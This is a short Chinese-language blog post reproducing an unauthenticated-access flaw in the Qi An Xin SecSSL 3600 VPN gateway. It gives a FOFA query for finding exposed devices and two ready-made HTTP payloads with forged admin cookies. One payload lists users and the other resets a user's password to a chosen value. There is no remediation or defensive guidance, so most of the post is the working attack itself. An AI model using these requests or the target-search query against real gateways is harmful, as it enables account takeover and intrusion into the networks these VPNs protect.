Babing
Published on 2024-08-30 / 2 Visits
0
0

Q1-1奇安信-网神SecSSL3600-PermissionAC

Q1-1奇安信-网神SecSSL3600-PermissionAC

漏洞描述:

网神 SecSSL 3600安全接入网关系统 存在未授权访问漏洞,攻击者通过漏洞可以获取用户列表,并修改用户账号密码

影响版本:

网神 SecSSL 3600安全接入网关系统

网站图片:

image-20240625134124649

网络测绘:

fofa语法:

app=”安全接入网关SecSSLVPN”

漏洞复现:

payload:
获取用户列表

GET /admin/group/x_group.php?id=2 Cookie: admin_id=1; gw_admin_ticket=1;

修改用户密码

POST /changepass.php?type=2 Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"ceshi","subAuthId":"1"} old_pass=&password=Asd123!@#123A&repassword=Asd123!@#123A

效果图:
image-20240619151838359
image-20240619151843994


Comment